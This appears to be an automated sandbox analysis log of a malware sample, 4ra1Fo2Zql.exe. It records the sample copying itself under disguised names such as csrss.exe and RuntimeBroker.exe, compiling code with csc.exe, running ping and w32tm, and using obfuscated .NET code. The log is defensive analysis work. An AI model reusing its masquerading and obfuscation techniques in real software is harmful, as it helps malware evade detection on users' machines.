                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: apphelp.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: version.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: wldp.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: sspicli.dll
Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Directory created: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe
Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Directory created: C:\Program Files\Windows Portable Devices\b4601131bf8590
Source: 4ra1Fo2Zql.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 4ra1Fo2Zql.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 4ra1Fo2Zql.exe Static file information: File size 1959424 > 1048576
Source: 4ra1Fo2Zql.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1dde00
Source: 4ra1Fo2Zql.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \System.pdb source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2199358921.000000001B952000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.pdb source: 4ra1Fo2Zql.exe, 00000000.00000002.2060132531.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.pdb source: 4ra1Fo2Zql.exe, 00000000.00000002.2060132531.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

Source: 4ra1Fo2Zql.exe, YJ0nwytrtfFSElJEkGn.cs .Net Code: Type.GetTypeFromHandle(jBVrEh6dwsCwn1TMD7p.njIvGwSeUaf(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(jBVrEh6dwsCwn1TMD7p.njIvGwSeUaf(16777245)),Type.GetTypeFromHandle(jBVrEh6dwsCwn1TMD7p.njIvGwSeUaf(16777259))})
Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline"
Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline"
Source: 4ra1Fo2Zql.exe Static PE information: section name: .text entropy: 7.554685403500024
Source: RuntimeBroker.exe.0.dr Static PE information: section name: .text entropy: 7.554685403500024
Source: GrVEPTmsoNTbY.exe.0.dr Static PE information: section name: .text entropy: 7.554685403500024
Source: csrss.exe.0.dr Static PE information: section name: .text entropy: 7.554685403500024
Source: GrVEPTmsoNTbY.exe0.0.dr Static PE information: section name: .text entropy: 7.554685403500024
                              Source: 4ra1Fo2Zql.exe, OT2fhhbTIUTxcPNvcmZ.csHigh entropy of concatenated method names: 'W36cDXVLRBc', 'XN1bJlTGJ8', 'g0DbS9HLhw', 'dK4bV0w13s', 'UvGYVDcYuOmpnWUFmB09', 'gl4aT0cY9gRSJoBwANFo', 'oW3jNucYERZsm88XnZA4', 'QacR5GcYTmi4H6pAnxwO', 'shV66mcYqEpmNcrtKu3w', 'o58blwcYJYbODoNoyxLC'
                              Source: 4ra1Fo2Zql.exe, DKKIfSNFCCxQDUka87n.csHigh entropy of concatenated method names: 'c9rNfXJGhS', 'zLqNlR4UcA', 'vIvNRcCXO3', 'OMoN8IXpAn', 'Dispose', 'VFDVVrcglepHk4ZOJd4a', 'k7fgITcgpEbXjZv9OeiA', 'jcTyyPcgf5IepNc3svPM', 'X6Fy6UcgR6nBQgyadIxp', 'aq9ANRcg8xAxUXxtD70u'
                              Source: 4ra1Fo2Zql.exe, GcbayIGlb8oSTZlMk62.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'DPScCQZ088T', 'nGbG8KfZh1', 'imethod_0', 'JgqvmucFSyWEAbWGop81', 'gcUbu2cFVTlXvtpxijfv', 'NpyYpEcFHBMXofmHq43K', 'rej3HJcFw1nasPbGgiSW'
                              Source: 4ra1Fo2Zql.exe, fQanusvHeXysFOfABrc.csHigh entropy of concatenated method names: 'QMN1ijTwVU', 'TVxlwqc36K0M7hrK4UYC', 'HjftWLc3Ar7rmvQaj8LO', 'B81gJwc3zHpKbAaXAQXD', 'csoVpecnjpUkhQKtSBHt', 'W99M6mc3tn7HTsfd6Kmg', 'CP0Wycc3gHH8SjmjjHuh', 'D3UbJ9cncYWpe0hjghLi', 'iSXuYXcnvhgXt3WuvMjK', 'BoP1jqSi1v'
                              Source: 4ra1Fo2Zql.exe, Pu3DSwC2RD7KEiL4vfo.csHigh entropy of concatenated method names: 'GXVC647Cuu', 'SDJE2ecFyHJfbTNcG4sd', 'WttO5JcF7KwtEVQdj3jC', 'bxmQcwcFihAf2rh7FuTJ', 'CsfR4TcFDYwLvdtoLCsM', 'rKfSxGcFd9iZTlQFsVJ1', 'aMLDX0cFh2EiM4NjARRs', 'YWOD0RcFZtX4FybGn9L6', 'oqP2njcFWSusulSfCymm', 'r7GG5q0gv5'
                              Source: 4ra1Fo2Zql.exe, TJhJRrlH1sgNhHgKGUf.csHigh entropy of concatenated method names: 'iX3aHLcxetRwaQ4NtLAX', 'bP4PeBcxLU7dUGaCFYIj', 'wns0gocxrMAaGAhfViMy', 'tL4lxwmbHn', 'Mh9', 'method_0', 'cWRlYYPAox', 'iTUlOB38RA', 'sJ3lNtuZPT', 'u9Ultl3tYr'
                              Source: 4ra1Fo2Zql.exe, iXuyu34YOBnWV6rGi7U.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'oX8cDZ3EnFt', 'ChqcCqi2EH7', 'GiPQNGcm3AXAqYpVXRNg', 'nTrEXncmneWdfuNNirkb', 'k3MWV9cmBBsM83yofyZY', 'OHK6PYcmFiUygrtoVKiX', 'z8mglgcmp79VQdqMtZkp'
                              Source: 4ra1Fo2Zql.exe, hgWe380VnaRJmLpIeVr.csHigh entropy of concatenated method names: 'wq9cDLEuKKJ', 'GYi0w2HSb5', 'V9IcDrmyrDW', 'I6NKxRcu8rEAQpWRoX6I', 'fFLEKFcukJqqsCu6xGRk', 'smfAWYcul7LtxX8uw8VL', 'NAek3CcuRgoHvmQ9rPwG', 'TUsddNcubdvGRPpXDb5M', 'aZpesQcu24MonfdogW2K', 'vcXxDAcumIWLhHUjmAqL'
                              Source: 4ra1Fo2Zql.exe, Nx7HEtWQNP1A41ZuSaw.csHigh entropy of concatenated method names: 'Dispose', 'IUZWZ5evf7', 'paQWdpGF3Y', 'U5MWWQJonV', 'b1NnO4cb7dYVGLkJwiXI', 'GmLmNbcbQNcyJY0WJWJp', 'ziu3t8cbhl5qOHVF2KDx', 'TrgHSvcbZTf4f8Osm6FP', 'zeeiIBcbda1sFVV4YHZJ'
                              Source: 4ra1Fo2Zql.exe, Qon7Cv3x2nEwjN7u77h.csHigh entropy of concatenated method names: 'XkV3OrRBsm', 'OSS3NTra2J', 'LNH3t3OJkG', 'GEC3gaqtF6', 'sVR36fRRkj', 'nrwuftcSvUmF3lswSYBF', 'dtGVf7cSjOm5OAI7SjrA', 'THxVGncScDvl8B9Uqy1L', 'gTvUG8cS1fUallXMFFNh', 'd8kwg6cSCIYvfGGtpwMt'
                              Source: 4ra1Fo2Zql.exe, DB9M1HydFgb7nonCfFL.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'OofKgucREhv9J3wt4878', 'zT4MFrcRT76uBt4SVKm5', 'Fhj4O8cRqjvgcM369q6X', 'gdqyeumpF3'
                              Source: 4ra1Fo2Zql.exe, VPXbnP0djxnfTVe42Tm.csHigh entropy of concatenated method names: 'CTP00GRtFj', 'VpIwBWcu1Zrytnw7cKPa', 'RjwRQucuCs8FtjKy9QeQ', 'QyvG1ucucVr7I7NaVnDf', 'DNeFTqcuvoj1wAESO2y4', 'e26ENZcuGY7nTHmlye47', 'UAi0egA9SF', 'd2BKVLcmtEbHBwYsj0pb', 'FBPqATcmOwdpe8Lflf9D', 'RL45ErcmNZsrihK2vqBA'
                              Source: 4ra1Fo2Zql.exe, aVe74o1HUFWPtYIyrYU.csHigh entropy of concatenated method names: 'C23C1qPgYf', 'bhSCCuFmUD', 'QCBCGCklN7', 'JdV4rMcB5LCskngOqe8S', 'E6pTpBcBiE7RC7IffyBp', 'cTBxNicBCUdnEXy1mUgg', 'CrEnMQcBGqRUr2iGbUnn', 'sYACQEQA3Z', 'qt5FbLcBQixWBuWex1Vw', 'a74YJ0cBy986HBqNfB0L'
                              Source: 4ra1Fo2Zql.exe, IV9cyv2FFYTATxIxBVw.csHigh entropy of concatenated method names: 'KW62fPltq3', 'HlO2lfHeXO', 'LJa2RQZRci', 'M4i28OP73l', 'lxj2krDQ71', 'jFL2bp0Jfj', 'KpF22e23g9', 'qZb2mbn97G', 'wpu2uGgihJ', 'X2i29bbE74'
                              Source: 4ra1Fo2Zql.exe, HUrRKiDIw6cvRFMn0mo.csHigh entropy of concatenated method names: 'psqDsGXrwv', 'c5iv82clJRiDt2YT0oc9', 'g6xDiGclSUSJo9BdBA9R', 'Ge6iBYclVCoaZJ40jxxh', 'bFdP82clHTgbWI8LLoiq', 'AZINJuclwMJvWQAA54Mr', 'OO4kgYclTb9e3Zcl5Gqm', 'kv98puclqmD4nukQs5k4', 'iPGyQVclxtSW8qVZ9iDg'
                              Source: 4ra1Fo2Zql.exe, yhMBD4s7wNk7qAsjsr9.csHigh entropy of concatenated method names: 'hgysFExdvU', 'kipshBl2x0', 'AbHsZUXL8L', 'cB5sdUO3NM', 'VvHsWBr1MC', 'mLrsewh37m', 'OmNsLqEVqN', 'eeTsrGXv0g', 'sD1saKL0Jl', 'B9ts4ZG1V2'
                              Source: 4ra1Fo2Zql.exe, YSnMSvPQ1Ormf4YLlJ8.csHigh entropy of concatenated method names: 'UGrPZdWIlT', 'k9JPdGmR6Y', 'cm3PWGGLKF', 'tYtPef8wjm', 'NYnPLIyX2F', 'hdDl96cqMZAWjF7NfOFx', 'yAU8yfcqs2aNHgteotZF', 'd3B4p2cqXSfiu2X4NBYE', 'VoMofKcqPyI4gGtZCBjO', 'bBBxQlcqKIDXD9PlEawa'
                              Source: 4ra1Fo2Zql.exe, etFV6Q8RsMPCOytDGjt.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'FOMflhcxqLXS7Qhwfqe7', 'uVc5IxcxEYk0kJW4GNx7', 'IpEgUScxTP5pO7EiNX2t'
                              Source: 4ra1Fo2Zql.exe, tUEkmFiuw8NuO4CGsZ8.csHigh entropy of concatenated method names: 'EItiNZnAG4', 'ykoitiAEZs', 'QFgU9MclhsYYTH8fk5Sp', 'hcyqxBcl7ggyQiw8iTI9', 'WHIgH0clQm7ZFFENLO3P', 'L7WUqwclZyEiFgtGP1Hu', 'AvPiE5YN3E', 'DD4iTY0TLF', 'wyXiq87WPy', 'TsDiJLTKIf'
                              Source: 4ra1Fo2Zql.exe, TR8Tju5ug4lftAofk1l.csHigh entropy of concatenated method names: 'R5Q5NA9JYt', 'CPb5tlT6XV', 'RQI5gNj99V', 'jD566icfykUmGTdvmnFA', 'bIJPDucf7A5qI1o0h7F5', 'mbY0Fqcfi8HAqSRjqkUv', 'CsBAgecfDndY9obHYUsR', 'o0G5E2L24f', 'O6g5TA09TH', 'gac5q7QflY'
                              Source: 4ra1Fo2Zql.exe, sCysD0GysTxMGnuL2OO.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'RZNcDGGny9k', 'vnWcCcgqcIs', 'jg8bFFcF0Iwwx2Ccin00', 'IAaFM6cFU27yHW2gulhu', 'sFXwANcFINTNqA3dEvag', 'l5H0oMcFoi5ioVTMIZZo'
                              Source: 4ra1Fo2Zql.exe, nDbLvo3qVLKVJF7sP1m.csHigh entropy of concatenated method names: 'pGZ3SkMnhw', 'Ise3VnKgj9', 'q8n3HDL2k7', 'yFHfgjcJNcDIymf9fpcW', 'j2UJi3cJYXKkQKI6FgPs', 'XSb8OUcJOg6MxgXAtm0b', 'xJj7umcJteC1YhauhqqQ', 'hEiV5FcJghVS2cgklb29', 'sTsexFcJ6clQISHo9k86', 'MA4iSecJARrFTqtccJ3r'
                              Source: 4ra1Fo2Zql.exe, y2cQVhbyso8ZBUkcRvA.csHigh entropy of concatenated method names: 'FgKbXwtqJU', 'trFGJPcY3bpmOwHJA5Ao', 'D9SFPUcYnCBEjnrkBIR4', 'hSwVuccYPVa7d5eaxYWZ', 'wG5vhmcYK2jJNLsqepfl', 'PhwHpDcYB1NQBKRowYCm', 'IPy', 'method_0', 'method_1', 'method_2'
                              Source: 4ra1Fo2Zql.exe, Hi2iCjPFwOK39Y9KPHC.csHigh entropy of concatenated method names: 'method_0', 'jJIPfPp4yl', 'eQBPlqwxwg', 'cvjPRreb8A', 'OWDP8IGZsl', 'G7kPkVUY4F', 'Ot5Pb0OtiT', 'wkjK0XcqkTZIU7I6tZYK', 'PuW6JncqRJWU2ULcaefh', 'qUgY6Jcq829jaO7YkxmM'
                              Source: 4ra1Fo2Zql.exe, vOSyaTvGSDci05XbLCs.csHigh entropy of concatenated method names: 'FfTvieBunt', 'OaRvDmy10u', 'qWAvync7nu', 'Hvfv7NlMmb', 'xXM5FMc3WSVPLIi2b1jF', 'jcnBdnc3ZAfnXQenQcey', 'hjC7aLc3dZLrx7Bx3sXa', 'OPoOBoc3eGrZIsbRu43B', 'FC1qI9c3LtlP4QNZtcAY', 'mMDcgvc3riCek25bfA6V'
                              Source: 4ra1Fo2Zql.exe, KG8EEGpUc9XH9hEnkVj.csHigh entropy of concatenated method names: 'Fi1fds1NWo', 'N5eMsmcwvPZb7YVXXwOe', 'mcADgqcw1ddyWnmgCZ4o', 'kt5', 'uUIpoYuMgx', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'Suz'
                              Source: 4ra1Fo2Zql.exe, FkLS7gDLVM8h3jrb8Jh.csHigh entropy of concatenated method names: 'Ga1D0C5FLK', 'UiH0FOcl9fcl86h6l18A', 'pqS4Zgclm4GihxYYRC72', 'QiWnUIcluy20ZJqha4iv', 'vQqDaSg7UD', 'TbjUUkclR7anoTD1prwG', 'fHIoqBcl8LpvYuLNwSUD', 'CwOgvxclkTPvRti6pd2c', 'AmsDEMclfY7Id1DUMQdi', 'ALG8VbclldV1yExKXPpt'
                              Source: 4ra1Fo2Zql.exe, wnVArrWogH7KjABKws0.csHigh entropy of concatenated method names: 'wNd4ZUfLYp', 'e3P4ds6WGo', 'vQjqw0c2OhGRhLtFYJQA', 'sBVBMjc2x8mubneffZIu', 'fFVZCqc2YLgRvcU9vRel', 'tBhwmwc2Nf4TMYTLifPk', 'MRf44BhLgY', 'fnGCTPc2gvYPrPFoKNf2', 'M2mdX7c26wWJSn3kHbiG', 'YZkaJZc2AXOhWgwtP3XV'
                              Source: 4ra1Fo2Zql.exe, XrgwotBTm4DxLoN6ZYc.csHigh entropy of concatenated method names: 'vVQBJaLQHB', 'DF1BSLqiu1', 'iXOBVBjpVX', 'qKwBH8AqjC', 'KSiBwRKKFw', 'N5iNiQcVtFJG68Z1oPhT', 'xyGU8WcVgbIQJDEaRfjW', 'wbiXgncV6XGL7Bl25ID1', 'iLudcYcVOUy51wDRfCZH', 'XivmticVNMV1GV29jUs9'
                              Source: 4ra1Fo2Zql.exe, UcNwSr0ETGRuQRnTxSt.csHigh entropy of concatenated method names: 'iGV0qqHH4x', 'oKV0JdSsAg', 'O130SbJ4VT', 'NoQZUWcun58loggP1feT', 'fSQPGScuKr2illI3LRYb', 'LObjWGcu3I34wwpV33aF', 'Rt7qJLcuBVWXQxuNjbAO', 'Ys6GyPcuF53EhO72R6wo', 'g2EALIcupLoGi64px8Ed'
                              Source: 4ra1Fo2Zql.exe, vMm4SAXEFg3QQNHt6xw.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'Mh4XqT4DCI', 'oWkXJBLx8q', 'Dispose', 'D31', 'wNK'
                              Source: 4ra1Fo2Zql.exe, QcIWbXfHqXy4gM2THdQ.csHigh entropy of concatenated method names: 'qrmfxjhNBP', 'k6r', 'ueK', 'QH3', 'GsnfYctrJq', 'Flush', 'aGUfOpaF4T', 'vuBfNF9HP1', 'Write', 'yYKfttmARc'
                              Source: 4ra1Fo2Zql.exe, yKLFTS2tKygjw4mmtKv.csHigh entropy of concatenated method names: 'yWl26oVfAb', 'Iuj2AEOcdl', 'Clu2zAkI2K', 'UPdmjkvvPx', 'sNLmcxvVc4', 'CQJmvQlZUt', 'Nhvm1gep81', 'rvwmCbrnaH', 'acGmGPl8Uy', 'ckim5F1vcb'
                              Source: 4ra1Fo2Zql.exe, eyoEW5UcN4RK4Gyefrx.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'GtycD4vw5jk', 'PDIcD0lge8N', 'WrGHPQcuwKEZvvUdJjh8', 'KLTaHccuxavdDlNIRMaR', 'JXnN7ncuYdmBv6m6Zcgg', 'UqFbaNcuO8eUALDaT4xI', 'ix0a8GcuNCRVH4G9MBA5', 'KOilHocutmn2h0eYTW5D'
                              Source: 4ra1Fo2Zql.exe, m6OFPnDm24BVmsEjggm.csHigh entropy of concatenated method names: 'P9X', 'vUrcDhfCWe1', 'imethod_0', 'hqGD9axyHg', 'DhP6qYcRiFHTOQxsRjIS', 'oOFPqpcRD3uZyPqxwB7e', 'cyDxXPcRyE2BB1GA1t0r', 'SJUrMXcR7AcTv9lK32lN', 'eXvXjMcRQJ5aIK4i43J8'
                              Source: 4ra1Fo2Zql.exe, yjf4BF43BlrZo9v9RXe.csHigh entropy of concatenated method names: 'WJ848o4Ke7', 'wXFQYMcmQOWJNbLp4J6P', 'J9shwncmy0vT3mpCcvtV', 'FUq118cm7uNitjusc3ke', 'B4Ngp5cmhgHyq3u351b6', 'gJK4BkONSr', 'mOH4FAcQgp', 'kUA4p6Ii2b', 'GNe7l8cmGZpm7vuSoWpk', 'L8mIhdcm5LO2NQrTJ6Mq'
                              Source: 4ra1Fo2Zql.exe, t08FVnvFBoPDGZMgM8T.csHigh entropy of concatenated method names: 'I1ZvuExKeI', 'nh9v98EVS5', 'KqqKZ3c38qjKKCABTk8s', 'J654LFc3kRx7mWGsgEVL', 'wA7vJ8T36J', 'f81dWrc3u5u5iiARXe5G', 'AvSCDjc39BDDTPN0Jq7L', 'SE5CEqc32HohDy1hc1Xc', 'NDFr7vc3mZbLpUlw3ngs', 'jk5klWc3EfovCUTPy6tH'
                              Source: 4ra1Fo2Zql.exe, d1UH2ei4FhydddUy7fo.csHigh entropy of concatenated method names: 'AXRi3bPESM', 'MfomDQcfJhUpaxBxbA4E', 'my2RJdcfSexVt6wS74a6', 'mrFioJcfTkllGdVrU9OR', 'dHSVp3cfqugyfRROhkwm', 'wsuC8wcfVxO4kT5vki9c', 'YPexflcfH642ey3du4RV', 'udSiUIrJiR', 'Xp1iIjb3Tu', 'Al6ior499S'
                              Source: 4ra1Fo2Zql.exe, VYVXbHUesxlnOWEIBWV.csHigh entropy of concatenated method names: 'n9saE3c9BYr8w7v6XOar', 'Q3KV78c9FsUQBHEaj3En', 'ewxoMpc9pbZOcS9j9Vkw', 'ReEyatc93TLReKwn9LYU', 'gDeqCMc9niNhTUhviG4X', 'method_0', 'method_1', 'kryUrIYEL9', 'yGoUaXi60L', 'PBBU4iMZj1'
                              Source: 4ra1Fo2Zql.exe, DDFQKBFg5J9JxUEKt0v.csHigh entropy of concatenated method names: 'C5rFAoEwjg', 'bsIFzpeOut', 'AUgpj5ZqlP', 'i9Ppc4XOwj', 'hhZpv4MmOY', 'MG3p17aY9T', 'Rpx', 'method_4', 'f6W', 'uL1'
                              Source: 4ra1Fo2Zql.exe, GGkOJOz9cBhq6YIyTj.csHigh entropy of concatenated method names: 'RFpcckVdhe', 'L1Fc129e92', 'MJAcCDCPlC', 'WDUcGDBein', 'WiSc5GRQck', 'K4ociM5yXV', 'Hjgcyc8xsb', 'R7clsucKixPxAoJZZCbH', 'jnkvoTcKDMexp7vNsoAJ', 'qmKBWDcKyG38srF9unDn'
